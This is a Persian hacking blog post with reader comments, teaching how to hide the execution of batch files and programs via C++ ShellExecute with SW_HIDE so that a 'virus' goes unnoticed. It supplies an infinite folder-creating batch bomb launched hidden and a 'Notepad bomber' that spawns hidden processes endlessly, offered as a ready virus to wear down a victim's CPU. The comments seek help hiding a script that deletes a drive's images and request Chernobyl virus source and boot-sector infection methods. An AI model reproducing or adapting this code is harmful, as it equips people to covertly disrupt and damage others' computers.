اجرای مخفی کدهای bat :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۹ بهمن ۰۰، ۱۸:۳۹ - امانوئل ویکتور
    رمز

همونطور که میدونین وقتی یه بچ فایلی رو اجرا میکنیم ، یه صفحه سیاه رنگ ظاهر میشه و کدهای ما اجرا میشه که اگه ما ویروس نوشته باشیم ، اونموقع ویروسمون خیلی سریع لو میره :(
در نتیجه باید هر طور که شده اونو مخفیش کنیم

توی این پست قراره به کمک زبان سی پلاس پلاس همچین کاریو انجام بدیم که برناممون بیاد بچ فایل مارو بسازه و اونو بصورت مخفی اجرا کنه

یا اینکه اصلا فایل Bat خودمون رو کنار برنامه قرار بدیم و دستور اجرا شدن مخفی اون رو بدیم

نکته مهم اینکه ما میتونیم به جای اجرای مخفی کدهای Bat
هر برنامه ی دیگه ای رو بصورت مخفی توی بک گراند اجرا کنیم
مثلا میتونیم ویروس Notepad Bomber بنویسیم که کداشو  ViRus32 توی این پست که مربوط به ویروس نویسی بود گفته بود
اما با این تفاوت که برنامه ی نوت پد ما بصورت مخفی اجرا بشه و کاربر بویی از چیزی نبره و سی پی یوش کم کم از شدت فشار از کار بیفته :(
خب دیگه زیادی خستتون نمیکنم و کدهارو میگم و والسلام :)

تکه کد پایین قراره کار مارو راه بندازه و برنامه ی مارو بصورت مخفی اجرا کنه

#include <windows.h>

int main() { ShellExecute(NULL, "open", "Path\\FileName", NULL, NULL, SW_HIDE); }

خب حالا از کد بالا استفاده میکنیم برای کارای دیگه ، مثلا کاری میکنیم که برنامه ی ما بیاد و یه بچ فایل تو دسکتاپ بسازه که بچ فایل ما بیاد و کاری کنه که یه پوشه با اسم ViRus32 تو دسکتاپ ساخته شه و پوشه هایی با اسم های تصادفی توی اون بسازه که اجرا شدن فایل ویروس بصورت مخفی هستش ، در نتیجه کد Bat ما به شکل پایین میشه :

MkDir C:\Users\Your_Username\Desktop\ViRus32
Cd C:\Users\%UserName%\Desktop\ViRus32
:Start
MkDir %Random%
Goto Start

که اگه بخوایم توی سی پلاس پلاس اینو بنویسیم و دستور بدیم که اول از همه فایل ویروس رو بسازه و بعدا دستور اجرا شدنش رو بصورت مخفی بده ، میشه به شکل زیر :

#include <windows.h>
#include <fstream>

using namespace std;

int main()
{
    ofstream path("C:\\Users\\Your_Username\\Folder_Maker.bat", ios::out);
    path << "MkDir C:\\Users\\Your_Username\\Desktop\\ViRus32\nCd C:\\Users\\Your_Username\\Desktop\\ViRus32\n:Start\nMkDir %Random%\nGoto Start" << endl;
    path.close();

    ShellExecute(NULL, "open", "C:\\Users\\Your_Username\\Folder_Maker.bat", NULL, NULL, SW_HIDE);
}

نکته : تو کد بالا باید یه خرده تغییر ایجاد کنین وگرنه باید نام کاربری خودتون رو جای Your_Username وارد کنین ... که برای فهمیدن اون یه ذره تغییر هم میتونین مراجعه کنین به کد قبلیش

کدای بالا یه سه چارتایی نکته دیگه داره که خودتون پیداش کنین دیگه ;d حس گفتنش نیس 

ضمنا بعد از اجرای کدهایی که بالاتر گفته شد بهتره که وارد تسک منیجر بشین و خط فرمان رو ببندین وگرنه اگه ابزار کد نویسی یا ...تون رو ببندینش اتفاقی نمیفته و پروسه ی ساخت پوشه همچنان ادامه خواهد داشت تا زمانی که سیستمتون ری استارت بشه

چون ما دستور اجرا شدن یه پروسس رو بصورت مخفی دادیم

در آخر هم میخوایم ویروس نوت پد بمبر رو بنویسیم که نوت پد رو بصورت متداول مخفی اجرا کنه

البته شما بهتره که از کد پایین استفاده کنین تا نوت پد رو ده بار بصورت مخفی اجرا کنه که بتونین از داخل تسک منیجر اونارو ببندینش و سیستمتون زیاد نره زیر هنگ

#include <windows.h>

int main()
{
    for(int i=0;i<=10;i++)
    {
        ShellExecute(NULL, "open", "notepad.exe", NULL, NULL, SW_HIDE);
    }
}

اما اگه میخواین به عنوان یه ویروس آماده استفاده کنین ، میتونین کدها رو داخل حلقه ی نامحدود قرار بدین که کدامون به شکل پایین در میاد که بهتره روی سیستمتون اجرا نشه :)

#include <windows.h>

int main()
{
    while(true)
    {
        ShellExecute(NULL, "open", "notepad.exe", NULL, NULL, SW_HIDE);
    }
}

موفق باشید

نظر (۱۹)

  • Virus32
  • آقای سر به هوا :)
  • سلام
    یه سوال داشتم ممنون میشم جواب بدی
    دارم برنامه نویسی یاد میگیرم میشه لطف کنی یه مسیر واسه یادگیری زبان های برنامه نویسی بهم نشون بدی؟!
    html-css-php که هیچی...
    از اینجا به بعد باید چی یاد بگیرم؟!
    میخوام برم سمت هک و امنیت و این حرف ها...

    باتشکر
    Virus32 Virus 32 :
    سلام عزیز
    والا این نوع سوالات در این وب زیاد پرسیده میشه و ما همیشه میمونیم که چی باید بگیم :)
    به نظرم این برمیگرده به خودتون
    شما باید خودتون ببینید به چه زبان ها و چه نوع برنامه هایی علاقه دارین
    در کل هر زبانی رو یاد بگیرید خالی از لطف نخواهد بود
    بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
    ** **** ***** *** **** ***

    ***** *** *** *** **** *** ** **** **

    ***** ** ******** ******** **** *****

    (ستاره فراموش نشه)
    سلام ویروس جان من یکم گیج شدم مثلا من یه فایل بات دارم که تموم عکس های درایو که من مشخص کردم رو پاک میکنه ولی وقتی که ران میکنمش خیلی زود لو میرم مثلا من اونو چطوری توی کد بالا قرار بدم ؟
    سایتم عالیه
    Virus32 Virus 32 :
    سلام عزیز
    من این پست رو الان دیدم و به نظرم خیلی ساده و روان توضیح داده
    برای انجام این کار باید با برنامه نویسی به زبان سی پلاس پلاس آشنا باشی
    اگر با زبان های حرفه ای تر آشنا نیسی میتونی این پست رو بخونی
    اونجا یه اسکریپتی هست برای مخفی اجرا شدن برنامه
    ولی سعی کن زودتر بری سمت زبان های حرفه ای تر
    کدهای قدیمی یکم دنگ و فنگشون بیشتر شده :)

    سلام ویروس
    میدونم سوال تکراری هست اما میش بگی کدوم زبان رو خودت از بین اینها واسه ویروس نویسی ترجبح میدی؟
    اسمبلی پایتون اتوایت؟
    Virus32 MR_C0D3R ‌ :
    هر چی یاد میگیری یاد بگیر ، ضرر نداره :))
  • Virus32
  • DęЯǞqΦЦlǞ ..
  • بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
    سلام *** باز ک دیل زدی؟
    Virus32 MR_C0D3R ‌ :
    نصب میکنم بهت پی ام میدم
    اون اکانت برای اون یکی خطم بود
    سلام داداش کدر ببخشید مزاحم شدم داداش من می خوام در مورد شبکه چیز هایی بدونم مثلا می خوام برم تو کار هک گفتن حداقل از شبکه باید یک چیز هایی بدونی اول بسم الله میشه یک منبع معرفی کنی ؟ یا اگه تو این وبلاگ هست ادرس بدی چوم مطالب زیاده نمیشه گشت مر30
    Virus32 MR_C0D3R ‌ :
    سلام
    راستیتش تا الان آموزش شبکه نذاشتیم
    قبلا یه کتاب راجب نتورک پلاس خونده بودم
    چند وقت دیگه براتون قرارش میدم
  • Virus32
  • DęЯǞqΦЦlǞ ..
  • اوکی منتظرم
    Virus32 MR_C0D3R ‌ :
    فقط شاید یه خرده دیر بهت پی ام بدم
    چون الانم به زور اومدم یه سر بزنم و ....
    سلام بزرگوار من یکسری از مطالبو میخام بخونم نمیاد رمز میخاد میشه توضیح بدی.ودر ضمن اگر ممکنه آموزش رات و تروجان های اتو ران و بزار برامون.ممنون
    Virus32 MR_C0D3R ‌ :
    این پست رو دیدی ؟
    خود فایل سی پلاس پلاس رو چجوری میژخفی کنیم
    Virus32 MR_C0D3R ‌ :
    متوجه نشدم
    بیشتر توضیح بده ادمین های دیگه راهنماییت میکنن
    من دیگه از اینجا میرم و دیگه نیستم که کسیو راهنمایی کنم...
    منظورم این بود که وقتی سی پلاس پلاس مینویسیم اون صفحه کنسول میاد دیگه

    اونو چجوری مخفی کنیم؟
    Virus32 MR_C0D3R ‌ :
    #include <windows.h>
    #include <iostream>

    int main(){
    HWND hWin;
    hWin = GetForgroundWindow();
    ShowWindow(hWin,false);
    }
    البته قبلا اینجا هم گفته بودیمش...
    :(........
    http://s9.picofile.com/file/8366907684/Capture.JPG
    Virus32 MR_C0D3R ‌ :
    من چون کدشو از حفظ برات تایپ کردم
    بخاطر همین مشکل تایپی پیش اومدش
    یه حرف از کد رو ننوشته بودم
    کدها در واقع اینجوری میشه :)
    #include <windows.h>
    #include <iostream>

    int main(){
    HWND hWin;
    hWin = GetForegroundWindow();
    ShowWindow(hWin,false);
    }

    سلام دمت گرم‌ داداش خیلی چیزی‌ از سایتت یاد گرفتم یک سوال داشتم این کد باید توی ویژوال استودبو نوشته بشه نه ؟ اگه میشه یک اموزش نصب و کار باهاش رو بزارید ممنون.😘

    Virus32 MR_C0D3R ‌ :
    نصب ویژوال که کاری نداره
    مگه نمیدونی ایرانیا فقط روی Next میزنن ؟
    از همین روش استفاده کنی نتیجه میگیری D:

    کلی سرو کله زدم اومد دمت گرم ممنون

     

    "وقتی که یک bitch فایلی رو اجرا میکنیم" راستی sentry MBA رو هنوز مطلب ندادید چطور اخه؟؟! درضمن تو برنامه bat 2 exe compiler میشه bat رو به exe تبدیل کرد و طوری بشه که وقتی اجرا میشه چیزی باز نشه و دسترسی ادمین داشته باشه.... درضمن تو دادسر های هم XOIC رو هم بیارید، و خواهشا دست به دامنتون سورس ویروس چرنوبیل رو قرار بدید یا جیفو رو.... خواهشا چندین ساله دنبالشم، عقده ی چندین ساله! ، در ضمن میشه بگید ویروس رو چطور داخل بوت سکتور وارد کرد؟ سرتونو درد اوردم، به ولله من وبلاگتونو میپرستم!!

    Virus32 Virus 32 :
    راستش عزیز نیت کردم به سمت برنامه نویسی بریم و خوب بودن تمرین کنیم یه مدت D:
    به همین خاطر دوتا درخواست اولتون شاید یکم طول بکشه انتشارش
    ویروس چرنوبیل رو اگه بخوایید امشب آپلود میکنم ولی عزیز این ویروس دیگه کارایی نداره میدونید که؟
    ولی میشه برای تحقیق در مورد ویروس های بوت و بایوس ازش استفاده کرد D:

    از قرار معلوم من زیاد اومده بودم دیدگاه نوشتم ولی از دست خودم در رفته که کی و کجا..... راستش ویروس های قدیمی مثل چرنوبیل و تکیلا از دیرباز برام جالب بودن که رو هاردیسک و حافظه تاثیر میزاشتن، راستی ویروس دوره ی اسمبلی رو کی شروع میکنی؟ ما که با علاقه هم شده اموزش اسمبلیرو هرجایی که دیدیم طرف معلوم بود خودشو پاره کرده سر اموزش ولی من هیچی نمیفهمیدم از طرفی توی پایتون هر مشکلی و سوالی داشتم تو وبلاگت مطمئن بودم به یک نتیجه ایی میرسم...

    Virus32 Virus 32 :
    چرنوبیل و کلونر دو متد عجیب دارن که کلا روان آدم رو تحت تاثیر قرار میدن.
    با یه کلک جالب بوت سیستم ها رو ستکاری میکنن و ...
    یعنی میشه فکر کرد به ویروسی که نیاز به سیستم عامل نداره!!!
    دوره اسمبل رو خیلی وقت پیش خواستم استارت بزنم ولی نه تو دنیای واقعی نه مجازی اصلا کسی حوصله شو نداشت D:

    سلام، اسم یوزر رو چجوری بدست بیاریم؟

    Virus32 MR_C0D3R ‌ :
    سلام
    Echo %Username%
    یا
    Net user

    سلام اسم یوزر رو توی سی پلاس پلاس چجوری بدست بیاریم؟

    Virus32 32 Attacker ‌ :
    همین جا توو کدهای bat بنویس 
    echo %username%
    یا
    Net user

    داداش من میگم اسم یوزر تو سی پلاس نه بت

     

    یعنی تو بچ فایل نمیخوام کلا برای یه برنامه دیگه

     

    Virus32 MR_C0D3R ‌ :
    خب تو باید بگی تا من بدونم دیگه
    همینجوری میای سوال میکنی و میری
    خب منم توی اون لحظه هر چی به ذهنم برسه رو میگم دیگه -_-
    cout << getenv("USERPROFILE") << endl;

    سلام،داش یه سوال داشتم

    من یه فایلی دارم دستم که پسوندش So هستش و میخوام توی اون یه ایپی هست که اونو عوض کنم و ب جاش ایپی که میخوامو بزارم توش وصل شه،ولی متاسفانه ایپی مخفی هستش،اونو با چه روشی میشه پیداش کرد و عوضش کرد؟

    Virus32 Virus 32 :
    سلام
    نمیدونم این فایل so رو چجوری باز کردی که میتونی تشخیص بدی داخلش آی پی وجود داره با وجود اینکه آی پی هم مخفیه !
    so بیشتر مربوط به لینوکس و مک میشه که همون dll تو ویندوز هستش
    نمیشه به زبان انسان تبدیلش کرد
    مثل کدهای هش یک طرفه هستن
    این فایل ها یجور کتابخونه های مشترک بین زبان سی و سی پلاس هستن.
    اگه یادتون باشه قبلا زیر یکی از پست ها توضیح دادم که تو برنامه نویسی وقتی از یه کد کوچیک از یه کتابخونه ی بزرگ استفاده میکنیم برای اینکه بعد از کامپایل برنامه لازم نباشه کل کتابخونه هارو اتچ کنیم به پروژه از dll های کوچکتری شامل قسمت های مورد نیاز کتابخونه های دیگه استفاده میکنیم که این باعث میشه حجم پروژه کمتر شه و سرعت و امنیت بیشتری داشته باشیم
    این فایل های so هم دقیقا همون نقش رو ایفا میکنن با این فرق که پیچیده تر از dll های ویندوز هستن ، چون به زبان ماشین نزدیک ترن و بیشتر رابطی بین زبان های سی و سی پلاس هستن و میشه در آن واحد یکی از این فایل ها به کمک چندین پروژه بیاد
    البته این فایل ها در ویندوز هم کم و بیش دیده میشن که باز کردن و ویرایششون تقریبا کار بیهوده ای خواهد بود مثل تنظیمات ریسورس پروژه های دات نت که با دستکاریشون مجبور میشی کل پروژه رو از نو بنویسی:(
    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی